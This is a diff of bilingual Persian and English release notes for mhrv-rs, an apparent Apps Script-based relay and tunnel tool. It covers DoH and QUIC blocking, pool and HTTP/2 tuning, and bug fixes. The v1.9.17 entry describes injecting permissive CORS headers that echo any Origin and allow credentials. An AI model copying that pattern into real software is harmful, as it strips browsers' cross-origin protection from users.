+• Block DoH by default (PR [#763](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/pull/763) از @yyoyoian-pixel): مرورگرها روی DoH (chrome.cloudflare-dns.com، dns.google، …) به‌طور پیش‌فرض هر name lookup را از طریق tunnel می‌فرستند که ~۱.۵ثانیه overhead به هر page load اضافه می‌کنه. حالا با `block_doh: true` (پیش‌فرض)، CONNECTهای DoH فوراً rd می‌شن — مرورگر به system DNS fallback می‌کنه که `tun2proxy` با virtual DNS فوراً resolve می‌کنه. روی Android UI: Block DoH و Bypass DoH toggle در Advanced. Block over Bypass تقدم داره. همچنین fix bug Android: `tunnelDoh` در Android default `false` بود و در Rust `true`، باعث می‌شد config mismatch بشه و `bypass_doh_hosts` روی Android خاموش بمونه — اکنون default‌ها synced.
+• TLS connection pool tuning (PR [#751](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/pull/751) از @yyoyoian-pixel):
+  - **Pool refill loop:** background task که دائماً ≥۸ connection ready نگه می‌داره، یکی یکی (نه burst) باز می‌کنه با ۵ ثانیه interval check
+  - **Freshest-first acquire:** به‌جای pop کردن آخرین entry، connection با بیشترین TTL باقی‌مانده انتخاب می‌شه
+  - **Pool TTL ۴۵→۶۰ ثانیه:** connection‌ها بیشتر زنده می‌مونن، churn کاهش
+  - **Coalesce step ۱۰→۲۰۰ms:** Full mode batch packing تنظیم — bottleneck dominant ~۱.۵s Apps Script round-trip است، 200ms wait نسبت به اون نامحسوس و ۳-۵× ops per batch بیشتر pack می‌کنه روی page load. (مقدار قبلی 10ms از v1.9.8 بود — این revert محافظه‌کارانه‌تر است.)
+• Fronting groups example: `github.io` به Fastly group اضافه شد (PR [#747](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/pull/747) از @Shjpr9). GitHub Pages روی Fastly anycast `151.101.x.x` است.
+• تست: ۱۷۹ lib + ۳۵ tunnel-node test همه pass.
+---
+• Block DoH by default (PR [#763](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/pull/763) from @yyoyoian-pixel): browsers' DoH (chrome.cloudflare-dns.com, dns.google, …) was sending every name lookup through the tunnel by default, adding ~1.5s overhead per page load. With `block_doh: true` (now default), DoH CONNECTs are rejected immediately — the browser falls back to system DNS, which `tun2proxy` resolves instantly via virtual DNS. Android UI: Block DoH and Bypass DoH toggles in Advanced settings; Block takes priority over Bypass. Also fixes an Android config bug where `tunnelDoh` defaulted to `false` Android-side but `true` in Rust — the field was never serialized so `bypass_doh_hosts` matching was silently broken on every fresh Android install. Defaults are now synced.
+• TLS connection pool tuning (PR [#751](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/pull/751) from @yyoyoian-pixel):
+  - **Pool refill loop:** background task that maintains ≥8 ready connections, opening them one at a time (no burst) with a 5s interval check
+  - **Freshest-first acquire:** picks the connection with the most remaining TTL instead of popping whatever is on top
+  - **Pool TTL 45→60s:** connections live longer, less churn
+  - **Coalesce step 10→200ms:** Full mode batch packing; the dominant bottleneck is the ~1.5s Apps Script round-trip, so 200ms wait is negligible against it but packs 3–5× more ops per batch during page loads. (The previous 10ms value was the v1.9.8 default — this is a more conservative revert.)
+• Fronting groups example: added `github.io` to the Fastly group (PR [#747](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/pull/747) from @Shjpr9). GitHub Pages is on the same Fastly anycast `151.101.x.x` as the other entries in that group.
+• Tests: 179 lib + 35 tunnel-node tests passing.
diff --git a/docs/changelog/v1.9.12.md b/docs/changelog/v1.9.12.md
new file mode 100644
index 00000000..e7ee6959
--- /dev/null
+++ b/docs/changelog/v1.9.12.md
@@ -0,0 +1,4 @@
+<!-- see docs/changelog/v1.1.0.md for the file format: Persian, then `---`, then English. -->
+• Fix `parallel_relay` causing duplicate POSTs ([#743](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/743)): وقتی `parallel_relay > 1` تنظیم بود، تک‌POST کاربر (مثل ارسال کامنت در GitHub) به‌عنوان دو/چند درخواست همزمان به سایت مقصد می‌رسید + کامنت دو بار ثبت می‌شد. علت: `select_ok` فقط future‌های Rust سمت ما را cancel می‌کنه، ولی Apps Script سرور‌سایده هیچ خبری از cancel ندارد — هر فراخوانی fan-out روی Apps Script کامل می‌شه و `UrlFetchApp.fetch()` هر کدام به مقصد می‌رسه. حالا fan-out فقط برای متدهای **idempotent** (GET / HEAD / OPTIONS) اجرا می‌شه؛ POST / PUT / PATCH / DELETE همیشه sequential می‌رن — کاربر روی browse کاهش tail latency رو نگه می‌داره و روی form submit از duplicate side-effect ایمن می‌مونه. الگوی همان `SAFE_REPLAY_METHODS` که در `Code.gs` `_doBatch` fallback داریم. تست regression جدید locks down predicate. **۱۸۰ lib + ۳۵ tunnel-node test** همه pass.
+---
+• Fix `parallel_relay` causing duplicate POSTs ([#743](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/743)): with `parallel_relay > 1` set, a single user POST (e.g. submitting a comment on GitHub) was reaching the destination as two or more concurrent requests, so the comment got posted twice. Root cause: `select_ok` only cancels the loser futures on our side, but Apps Script has no way to learn about that cancellation server-side, so every fan-out call still runs to completion and each `UrlFetchApp.fetch()` to the destination still fires. Fan-out now only triggers for **idempotent** methods (GET / HEAD / OPTIONS); POST / PUT / PATCH / DELETE always go sequential — users keep the p95 tail-latency win on browsing without losing correctness on form submits. Same pattern as the `SAFE_REPLAY_METHODS` guard in `Code.gs` `_doBatch` fallback. New regression test locks down the predicate. **180 lib + 35 tunnel-node tests passing.**
diff --git a/docs/changelog/v1.9.13.md b/docs/changelog/v1.9.13.md
new file mode 100644
index 00000000..16691c0a
--- /dev/null
+++ b/docs/changelog/v1.9.13.md
@@ -0,0 +1,4 @@
+<!-- see docs/changelog/v1.1.0.md for the file format: Persian, then `---`, then English. -->
+• Hotfix v1.9.11 / v1.9.12 build failure: PR [#763](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/pull/763) فیلد جدید `block_doh` به `Config` اضافه کرد ولی `src/bin/ui.rs::FormState` (که Config رو با struct literal می‌سازه) به‌روز نشد، در نتیجه `mhrv-rs-ui` در CI با `error[E0063]: missing field 'block_doh'` کامپایل نشد. هر دو release CI v1.9.11 و v1.9.12 fail شدن — هیچ binary منتشر نشد. این release همان تغییرات رو با fix UI ship می‌کنه. **پیامد محصول:** v1.9.13 = v1.9.11 + v1.9.12 + UI compile fix. تست: 180 lib + 35 tunnel-node + UI release-mode build همه green.
+---
+• Hotfix v1.9.11 / v1.9.12 build failure: PR [#763](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/pull/763) added a new `block_doh` field to `Config` but didn't update `src/bin/ui.rs::FormState` (which constructs `Config` via a struct literal), so `mhrv-rs-ui` failed to compile in CI with `error[E0063]: missing field 'block_doh'`. Both v1.9.11 and v1.9.12 release CI runs failed and shipped no binaries. This release is the same set of changes with the UI compile fix included. **Product impact:** v1.9.13 = v1.9.11 + v1.9.12 + UI compile fix. Tests: 180 lib + 35 tunnel-node + UI release-mode build all green.
diff --git a/docs/changelog/v1.9.14.md b/docs/changelog/v1.9.14.md
new file mode 100644
index 00000000..85817fad
--- /dev/null
+++ b/docs/changelog/v1.9.14.md
@@ -0,0 +1,4 @@
+<!-- see docs/changelog/v1.1.0.md for the file format: Persian, then `---`, then English. -->
+• Fix v1.9.13 regression — کاربران v1.9.10 → v1.9.13 upgrade می‌کردن و حس می‌کردن کندتره ([#773](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/773)). علت: `block_doh` در Rust با `#[serde(default)]` برای فیلد `bool` به `false` resolve می‌شد (default trait از Rust)، نه `true` که PR [#763](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/pull/763) قصد داشت. کاربران existing با config.json بدون فیلد `block_doh` و `tunnel_doh = true` (default جدید از #468)، هر DNS lookup رو از مسیر Apps Script می‌فرستادن — ~۱.۵ ثانیه overhead هر page load. حالا `block_doh` با named-default function به `true` resolve می‌شه — مرورگر DoH reject می‌شه + system DNS via tun2proxy فوراً پاسخ می‌ده + هیچ tunnel round-trip دیگه. کاربران power که عمداً DoH از تونل می‌خوان، می‌تونن `block_doh: false` صریح بگذارن. تست: 180 lib + 35 tunnel-node + UI release-mode build همه green.
+---
+• Fix v1.9.13 perceived-slowness regression on upgrade ([#773](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/773)): `block_doh` was using `#[serde(default)]` on a `bool`, which resolves to Rust's `Default::default() = false` rather than the `true` PR [#763](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/pull/763) intended. Existing configs upgrading from v1.9.10 had no `block_doh` field, so they got `false` paired with `tunnel_doh = true` (the new default from #468) — every browser DoH lookup got tunneled through Apps Script, adding ~1.5s overhead per page load. Now `block_doh` uses a named-default function that returns `true` — DoH is rejected at the SOCKS5 listener so the browser falls back to system DNS (instant, via tun2proxy's virtual DNS) and no tunnel round-trip happens. Power users who specifically want DoH-through-tunnel can opt back in with `block_doh: false`. Tests: 180 lib + 35 tunnel-node + UI release-mode build all green.
diff --git a/docs/changelog/v1.9.15.md b/docs/changelog/v1.9.15.md
new file mode 100644
index 00000000..c6aac2ee
--- /dev/null
+++ b/docs/changelog/v1.9.15.md
@@ -0,0 +1,12 @@
+<!-- see docs/changelog/v1.1.0.md for the file format: Persian, then `---`, then English. -->
+• HTTP/2 multiplexing روی relay leg (PR [#799](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/pull/799) از @dazzling-no-more): ALPN از Google edge `h2` رو negotiate می‌کنه؛ اگه peer قبول کنه، تمام relay traffic (Apps Script direct، exit-node outer call، full-mode tunnel single ops، full-mode tunnel batches) روی یک TCP/TLS connection با ~۱۰۰ stream همزمان multiplex می‌شه به‌جای pool 8-80 socket. اگر h2 negotiate نشه، fallback خودکار به HTTP/1.1 keep-alive path قبلی. مزیت اصلی: یک Apps Script call کند دیگه head-of-line بقیه‌ی queue روی همان socket رو block نمی‌کنه — مهم‌ترین اثر روی streaming sites (YouTube/googlevideo) و concurrent fan-out (range-parallel downloads). Idempotency-safe retry: `RequestSent::{No, Maybe}` — `No` (قبل از send_request موفق) safely retried، `Maybe` فقط برای متدهای idempotent. **Kill switch:** `"force_http1": true` در config.json تمام h2 path رو bypass می‌کنه و دقیقاً behavior pre-PR رو می‌ده. استراتژیک، این architectural fix برای regression #781 / #773 — h2 multiplexing pool tuning مسئله‌ی بسیار کم‌اهمیت می‌کنه. ۱۸۰→۱۹۷ test (+۱۷ test جدید).
+• Block QUIC default `true` (PR [#805](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/pull/805) از @yyoyoian-pixel): QUIC روی tunnel TCP-based منجر به TCP-over-TCP meltdown (<1 Mbps) می‌شد. مرورگرها با drop UDP/443 خاموش، در ثانیه‌ها به TCP/HTTPS برمی‌گردن — نتیجه: page load و YouTube video load ابتدایی در Full mode به‌طرز محسوسی سریع‌تر. UI toggle در Android Advanced + Desktop checkbox (قبلاً config-only از #213). Android serialization همیشه `block_quic` رو emit می‌کنه تا default Rust silently override نشه.
+• Accessibility: `accesskit` feature برای eframe فعال شد (PR [#819](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/pull/819) از @brightening-eyes — drop به نفع #750). screen reader users (NVDA / JAWS / VoiceOver / Orca) حالا کامل می‌تونن از UI استفاده کنن. tested with real screen reader by author.
+• GitHub Actions Full tunnel docs (PR [#783](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/pull/783) از @euvel): ۳ مسیر برای کاربرانی که نمی‌توانن VPS بخرن — cloudflared Quick (zero accounts beyond GitHub، URL موقت)، ngrok (free account، URL موقت)، cloudflared Named (CF domain، URL دایم). در `assets/github-actions-tunnel/`. هر runner GitHub Actions ۶ ساعت timeout داره — repeatable ولی persistent نه. برای daily traffic سنگین همچنان VPS توصیه می‌شه.
+• تست: ۱۹۷ lib + ۳۵ tunnel-node test همه pass.
+---
+• HTTP/2 multiplexing on relay leg (PR [#799](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/pull/799) from @dazzling-no-more): ALPN-negotiates `h2` against the Google edge; if the peer agrees, all relay traffic (Apps Script direct, exit-node outer call, full-mode tunnel single ops, full-mode tunnel batches) rides one TCP/TLS connection multiplexing ~100 concurrent streams instead of the legacy 8-80-socket pool. Falls back to the existing HTTP/1.1 keep-alive path automatically when h2 isn't viable. Big win: a slow Apps Script call no longer head-of-line-blocks the rest of the queue on the same socket — most user-visible on streaming sites (YouTube/googlevideo) and concurrent fan-out (range-parallel downloads). Idempotency-safe retry via `RequestSent::{No, Maybe}` — `No` (anything before `send_request` succeeds) is safely retried, `Maybe` only retries for idempotent methods. **Kill switch:** `"force_http1": true` in config.json bypasses the entire h2 path and gives back exactly the pre-PR behaviour. Strategically this is the architectural fix for the perceived-slowness regression in #781 / #773 — h2 multiplexing makes the pool tuning machinery much less load-bearing because one connection serves all requests. 180 → 197 lib tests (+17 covering ALPN selection, sticky disable, RequestSent classification on RST_STREAM, 421 handling, gzip parity, POST body transmission, redirect chain, force_http1 round-trip).
+• Block QUIC by default (PR [#805](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/pull/805) from @yyoyoian-pixel): QUIC over the TCP-based tunnel was causing TCP-over-TCP meltdown (<1 Mbps). With UDP/443 silently dropped, browsers detect the failure and fall back to TCP/HTTPS within seconds — significantly faster initial page and YouTube video load times in Full mode. UI: "Block QUIC" toggle in Android Advanced settings, "Block QUIC (UDP/443)" checkbox in desktop UI (was config-only since #213). Android serialization always emits `block_quic` so the Rust default can't silently override the user's choice.
+• UI accessibility: enabled the `accesskit` feature on eframe (PR [#819](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/pull/819) from @brightening-eyes — closes #750). Screen reader users (NVDA / JAWS / VoiceOver / Orca) can now navigate the desktop UI cleanly. Tested with a real screen reader by the contributor.
+• GitHub Actions Full tunnel docs (PR [#783](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/pull/783) from @euvel): 3 paths for users who can't or won't buy a VPS — cloudflared Quick (zero accounts beyond GitHub, temporary URL), ngrok (free account, temporary URL), cloudflared Named (CF domain, permanent URL). Lives in `assets/github-actions-tunnel/`. Each GitHub Actions runner has a 6-hour timeout — repeatable but not persistent; serious daily traffic should still go VPS.
+• Tests: 197 lib + 35 tunnel-node tests passing.
diff --git a/docs/changelog/v1.9.16.md b/docs/changelog/v1.9.16.md
new file mode 100644
index 00000000..86b9547b
--- /dev/null
+++ b/docs/changelog/v1.9.16.md
@@ -0,0 +1,4 @@
+<!-- see docs/changelog/v1.1.0.md for the file format: Persian, then `---`, then English. -->
+• Fix Full mode large-download truncation at exactly 50 MiB ([#863](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/863)). Apps Script's response body cap is ~50 MiB; tunnel-node had a `TCP_DRAIN_MAX_BYTES = 16 MiB` per-session cap to stay under it, but **multiple sessions in the same batch** each contributed up to 16 MiB raw, summing past 50 MiB on busy VPS (Steam/CDN downloads with N≥4 concurrent sessions). Symptom: `batch JSON parse error: EOF while parsing a string at line 1 column 52428630 (body_len=52428630)` followed by session abort + download restart from 0. Fix: new `BATCH_RESPONSE_BUDGET = 32 MiB` total-batch cap; the drain loop tracks remaining budget across sessions and stops one short of the cliff. Sessions deferred this batch keep their buffered data and drain on the next poll (no data loss). New regression test `drain_now_respects_caller_budget_below_per_session_cap`. ۳۶ tunnel-node test (was 35) همه pass + ۱۹۷ lib test همه pass.
+---
+• Fix Full mode large-download truncation at exactly 50 MiB ([#863](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/863)). Apps Script's response body cap is ~50 MiB; tunnel-node had a `TCP_DRAIN_MAX_BYTES = 16 MiB` per-session cap to stay under it, but **multiple sessions in the same batch** each contributed up to 16 MiB raw, summing past 50 MiB on busy VPS (Steam / CDN downloads with N≥4 concurrent sessions). Symptom: `batch JSON parse error: EOF while parsing a string at line 1 column 52428630 (body_len=52428630)` followed by session abort + download restart from 0. Fix: new `BATCH_RESPONSE_BUDGET = 32 MiB` total-batch cap; the drain loop tracks remaining budget across sessions and stops one short of the cliff. Sessions deferred this batch keep their buffered data and drain on the next poll (no data loss). New regression test `drain_now_respects_caller_budget_below_per_session_cap`. **36 tunnel-node tests** (was 35) + **197 lib tests** all green.
diff --git a/docs/changelog/v1.9.17.md b/docs/changelog/v1.9.17.md
new file mode 100644
index 00000000..1c80361d
--- /dev/null
+++ b/docs/changelog/v1.9.17.md
@@ -0,0 +1,4 @@
+<!-- see docs/changelog/v1.1.0.md for the file format: Persian, then `---`, then English. -->
+• Inject CORS response headers after relay — اضافه شد به‌جای فقط preflight short-circuit. مرورگرها در درخواست‌های cross-origin (مثل YouTube’s `youtubei/v1/next` / `youtubei/v1/comments` که از script context fire می‌شه) responseـی نیاز دارن با `Access-Control-Allow-Origin` که با origin درخواست match کنه + `Allow-Credentials: true`. Apps Script's `UrlFetchApp.fetch()` گاهی header‌های ACL مقصد رو preserve نمی‌کنه، یا destination با `Allow-Origin: *` پاسخ می‌ده که با credentialed request ناسازگاره. mhrv-rs حالا header‌های `Access-Control-*` پاسخ relay رو strip می‌کنه + permissive set تزریق می‌کنه که با origin درخواست echo می‌شه. **علت ریشه‌ای**: YouTube comments نمی‌اومدن load بشن + گاهی restricted-mode error به همین دلیل ظاهر می‌شد. ایده credit: ThisIsDara/mhr-cfw-go (Go rewrite of upstream Python). فقط برای درخواست‌هایی با Origin header اعمال می‌شه — non-CORS traffic (curl، apps native) دست‌نخورده می‌مونه. ۱۹۷ → **۲۰۰ lib test** (+۳ regression test for CORS injection edge cases).
+---
+• Inject CORS response headers after relay (in addition to the existing preflight short-circuit). When browsers issue cross-origin fetches from script contexts — e.g. YouTube's `youtubei/v1/next` / `youtubei/v1/comments` calls, which fire from the player JS — they require the response to carry `Access-Control-Allow-Origin` matching the request's origin AND `Allow-Credentials: true`. Apps Script's `UrlFetchApp.fetch()` sometimes doesn't preserve the destination's ACL headers, or the destination returns `Allow-Origin: *` which is incompatible with credentialed requests. mhrv-rs now strips any `Access-Control-*` headers from the relay response and injects a permissive set keyed on the request's `Origin`. **Root cause**: YouTube comments not loading + the "restricted mode" error sometimes surfacing on cross-origin XHR responses the browser silently dropped. Idea credit: ThisIsDara/mhr-cfw-go (Go rewrite of upstream Python's CFW variant). Only applies when the original request had an `Origin` header — non-CORS traffic (curl, app-level HTTP clients) passes through byte-for-byte unchanged. 197 → **200 lib tests** (+3 regression tests for CORS injection edge cases: wildcard-origin replacement, non-ACL header preservation, malformed-response passthrough).
diff --git a/docs/changelog/v1.9.18.md b/docs/changelog/v1.9.18.md
new file mode 100644
index 00000000..8b6814f0
--- /dev/null
+++ b/docs/changelog/v1.9.18.md
@@ -0,0 +1,18 @@
+<!-- see docs/changelog/v1.1.0.md for the file format: Persian, then `---`, then English. -->
+• Performance refactor of full-tunnel mux hot path ([#881](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/pull/881) by @dazzling-no-more) — zero-copy reads via `Bytes`/`BytesMut` و base64 encoding از روی single mux thread برداشته شد. هیچ wire-protocol change نداره — فقط internal data flow. (1) `tunnel_loop` و SOCKS5 UDP receive loop دیگه per-iteration `Vec::to_vec()` copy ندارن. `MuxMsg::{ConnectData,Data,UdpOpen,UdpData}` حالا `Bytes` (Arc-backed) carry می‌کنن به جای `Vec<u8>`/`Arc<Vec<u8>>`. TCP path threshold-based: ≥32 KB → `BytesMut::split().freeze()` (saves 64 KB memcpy on hot downloads); <32 KB → `Bytes::copy_from_slice` + `buf.clear()` (payload-sized retention). UDP path: fixed `Vec<u8>` recv buffer + size-guarded copy. (2) base64 encoding (تا ~3 MB per batch) از mux thread رفت به spawned task تو `fire_batch` بعد از per-deployment semaphore — single mux task دیگه serialize نمی‌شه. (3) Code quality: `BatchAccum::push_or_fire` (۴ match arm به ۱ کلپس)، `should_fire()` predicate با `saturating_add`، `encode_pending()` free function. ۲۰۰ → **۲۰۸ lib test** (+۸ regression: encode_pending × ۴، should_fire × ۳، batch_accum_reindexes_after_flush). API change: `TunnelMux::udp_open`/`udp_data` حالا `impl Into<Bytes>` می‌گیرن — existing callers با Vec<u8>/Bytes/BytesMut بدون تغییر کار می‌کنن.
+---
+• Performance refactor of the full-tunnel mux hot data path ([#881](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/pull/881) by @dazzling-no-more). No wire-protocol changes — internal data flow only.
+
+**1. Zero-copy reads via `Bytes`/`BytesMut`.** `tunnel_loop` and the SOCKS5 UDP receive loop drop per-iteration `Vec::to_vec()` copies. `MuxMsg::{ConnectData,Data,UdpOpen,UdpData}` now carry `Bytes` (Arc-backed internally) instead of `Vec<u8>`/`Arc<Vec<u8>>`; the `Arc::try_unwrap` dance for `pending_client_data` is gone. TCP path is threshold-based to avoid memory regressions:
+- **n ≥ 32 KB**: `BytesMut::split().freeze()` — saves the 64 KB memcpy on hot downloads.
+- **n < 32 KB**: `Bytes::copy_from_slice` + `buf.clear()` — payload-sized retention. Without this split, `bytes` 1.x's whole-allocation refcount would pin a full 64 KB per queued tiny read under semaphore stall (worst case ~96 MB on a backpressured tunnel).
+
+UDP path: fixed `Vec<u8>` recv buffer + `Bytes::copy_from_slice` after the 9 KB `MAX_UDP_PAYLOAD_BYTES` guard. `parse_socks5_udp_packet` split into `_offsets` + `&[u8]` wrapper so callers stay on the reusable buffer.
+
+**2. Base64 encoding moved off the single mux thread.** New internal `PendingOp { data: Option<Bytes>, encode_empty: bool }` flows through `mux_loop` with raw bytes. Actual `B64.encode(...)` runs in `fire_batch`'s spawned task, after the per-deployment semaphore. Up to ~3 MB of encoding per batch (50 ops × 64 KB) no longer serializes the single mux task.
+
+**3. Code quality (drive-bys).** `BatchAccum::push_or_fire` collapses 4× ~25-line match arms into ~10 lines each. `should_fire(pending_len, payload_bytes, op_bytes)` predicate extracted with `saturating_add`. `encode_pending(p) -> BatchOp` extracted as a free function for direct test coverage.
+
+**Public API change**: `TunnelMux::udp_open` and `udp_data` now take `data: impl Into<Bytes>` instead of `Vec<u8>` — existing in-tree callers passing `Vec<u8>`, `&'static [u8]`, `Bytes`, or `BytesMut` all keep compiling.
+
+200 → **208 lib tests** (+8 regression: `encode_pending_*` × 4, `should_fire_*` × 3, `batch_accum_reindexes_after_flush`).
diff --git a/docs/changelog/v1.9.19.md b/docs/changelog/v1.9.19.md
new file mode 100644
index 00000000..2d011ecf
--- /dev/null
+++ b/docs/changelog/v1.9.19.md
@@ -0,0 +1,10 @@
+<!-- see docs/changelog/v1.1.0.md for the file format: Persian, then `---`, then English. -->
+• UI accessibility — screen reader labels for NVDA / Narrator ([#1015](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/pull/1015) by @brightening-eyes, fixes [#916](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/916)). \`accesskit\` در Cargo.toml از قبل فعال بود ولی هیچ widget label-association نداشت — وقتی focus به یک text input یا combobox می‌رفت، NVDA فقط نوع control رو می‌گفت (\"edit\", \"combobox\") نه نام field رو. حالا \`form_row\` پلامبینگ \`egui::Id\` رو به widget می‌فرسته و هر widget با \`.labelled_by(label_id)\` به label visible خود معرفی می‌شه. تست شد توسط کاربر نابینایی که issue رو گزارش داد. ۲۰۸ lib test همه pass. (also includes [c437598](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/commit/c437598) fix for exit_node Content-Encoding + Content-Length stripping — ChatGPT / Claude / Reddit through exit-node now work without Content Encoding Error.)
+---
+• **UI accessibility — proper screen-reader labels for NVDA / Narrator** ([#1015](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/pull/1015) by @brightening-eyes, fixes [#916](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/916)). The `accesskit` feature was already enabled in `Cargo.toml` via eframe, but no widget had an explicit label association — so when focus moved to a text input or combobox, NVDA / Narrator only announced the control type ("edit", "combobox") instead of the field name. The fix plumbs `egui::Id` through `form_row` so each widget can call `.labelled_by(label_id)` to associate with its visible label. Tested by the blind user who originally reported the issue with their actual NVDA setup. 208/208 lib tests still pass.
+
+`form_row`'s signature changes from `widget: impl FnOnce(&mut egui::Ui)` to `widget: impl FnOnce(&mut egui::Ui, egui::Id)`. Two existing call sites that don't need the label id (the `Mode` combobox, `Share on LAN` checkbox) bind it as `_label_id` — no functional change there.
+
+• Also rolling up the [exit_node Content-Encoding fix](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/commit/c437598) (#964): `fetch()` (Deno / Bun / Node) auto-decompresses gzip / br / deflate response bodies, but the destination's `Content-Encoding: gzip` header was forwarded verbatim — telling the browser the body was gzipped when it was already plain. Browsers raised `Content Encoding Error: invalid or unsupported form of compression`. Strip both `Content-Encoding` and `Content-Length` from the forwarded headers (the Apps Script + Rust transport reframes the wire body anyway, so neither is meaningful end-to-end). Affects every compressed-response destination through exit-node: ChatGPT, Claude, Reddit, X, etc.
+
+**Action for exit-node users**: pull the latest [`assets/exit_node/exit_node.ts`](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/blob/main/assets/exit_node/exit_node.ts) and redeploy your Deno Deploy / VPS exit-node. The Rust binary side has nothing new for this fix — it's purely on the exit-node script.
diff --git a/docs/changelog/v1.9.2.md b/docs/changelog/v1.9.2.md
new file mode 100644
index 00000000..7fe74aba
--- /dev/null
+++ b/docs/changelog/v1.9.2.md
@@ -0,0 +1,4 @@
+<!-- see docs/changelog/v1.1.0.md for the file format: Persian, then `---`, then English. -->
+• backend جایگزین Apps Script + Cloudflare Worker (PR [#533](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/pull/533) از @dazzling-no-more): deploy `Code.cfw.gs` (variant جدید GAS در `assets/apps_script/`) + `worker.js` (Cloudflare Worker در `assets/cloudflare/`)، Apps Script یک layer thin auth+forward می‌شه که outbound fetch رو به CF edge می‌ده. mhrv-rs خود **بدون تغییر** — همان envelope JSON روی wire، همان `mode: "apps_script"`، `script_id`، `auth_key`. تنها تفاوت چیزی هست که Apps Script deployed بعد از authentication انجام می‌ده. این task audit در roadmap [#380](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/380) / [#393](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/393) رو close می‌کنه. **چرا** کاربران Persian گزارش دادن GAS+CFW combination از pure GAS برای browsing + chat-style سریع‌تر حس می‌شه. **سختگیر شده over upstream [denuitt1/mhr-cfw](https://github.com/denuitt1/mhr-cfw)**: per-request AUTH_KEY check (upstream omit می‌کرد → relay open اگر URL leak شد)، fail-closed اگر AUTH_KEY هنوز placeholder باشه، loop guard `x-relay-hop` + self-host fetch block، body drop on GET/HEAD برای match با Code.gs/UrlFetchApp permissiveness، SKIP_HEADERS parity، batch handler با `Promise.all` + soft cap `MAX_BATCH_SIZE = 40`. **محدودیت‌های صادقانه** (در docs explicit): با `mode: "full"` ناسازگار است (فقط HTTP-relay path port شده، نه raw-TCP/UDP tunnel ops). YouTube long-form بدتر می‌شه (30s CF Worker wall vs Apps Script ~6min — SABR cliff زودتر می‌رسه). Cloudflare anti-bot اثر معکوس داره (Worker IP اغلب stricter از Google IP). Day-one quota relief نیست (path batch ready ولی از client شیپ شده single-shape unreachable). **docs کامل** انگلیسی + فارسی در `assets/cloudflare/README.md` + `README.fa.md` شامل setup، model security سه AUTH_KEY match، trade-off table، Full mode incompatibility.
+---
+• Apps Script + Cloudflare Worker alternative backend (PR [#533](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/pull/533) by @dazzling-no-more): deploy `Code.cfw.gs` (new GAS variant in `assets/apps_script/`) plus `worker.js` (Cloudflare Worker in `assets/cloudflare/`), and Apps Script becomes a thin auth+forward layer that pushes the outbound fetch to CF's edge. mhrv-rs itself is **unchanged** — same JSON envelope on the wire, same `mode: "apps_script"`, `script_id`, `auth_key`. The only difference is what the deployed Apps Script does after it authenticates. Closes the audit task on the v1.9.x roadmap ([#380](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/380), [#393](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/393)). **Why**: recurring Persian-community feedback reports that GAS+CFW combination feels noticeably faster than plain GAS for browsing and chat-style workloads. **Hardened over upstream [denuitt1/mhr-cfw](https://github.com/denuitt1/mhr-cfw)**: per-request `AUTH_KEY` check (upstream omitted → open relay if URL leaks), fail-closed if `AUTH_KEY` still equals the placeholder, `x-relay-hop` loop guard + self-host fetch block, drops body on GET/HEAD to match `Code.gs`/UrlFetchApp permissiveness, SKIP_HEADERS parity, batch handler with `Promise.all` + soft cap `MAX_BATCH_SIZE = 40`. **Honest limitations called out in docs**: not compatible with `mode: "full"` (only HTTP-relay path ported; raw-TCP / UDP tunnel ops needed for messengers under Android full-mode aren't). YouTube long-form gets worse (30 s CF Worker wall vs Apps Script's ~6 min — SABR cliff arrives sooner). Cloudflare anti-bot is unaffected — exit IP becomes a Workers IP, which CF's anti-bot fingerprints as worker-internal (often stricter than a Google IP). No day-one `UrlFetchApp` daily-count relief; the batch-aware GAS+Worker path is wired and ready (`ceil(N / 40)` per N-URL batch) but unreachable from any shipping client today (mhrv-rs's HTTP-relay path is single-shape only). **Full docs** in English + Persian at `assets/cloudflare/README.md` + `README.fa.md` covering setup, the three-matching-`AUTH_KEY`s security model, trade-off table, full-mode incompatibility section. README updated with alternative-backend callout in both languages.
diff --git a/docs/changelog/v1.9.20.md b/docs/changelog/v1.9.20.md
new file mode 100644
index 00000000..57092af7
--- /dev/null
+++ b/docs/changelog/v1.9.20.md
@@ -0,0 +1,23 @@
+<!-- see docs/changelog/v1.1.0.md for the file format: Persian, then `---`, then English. -->
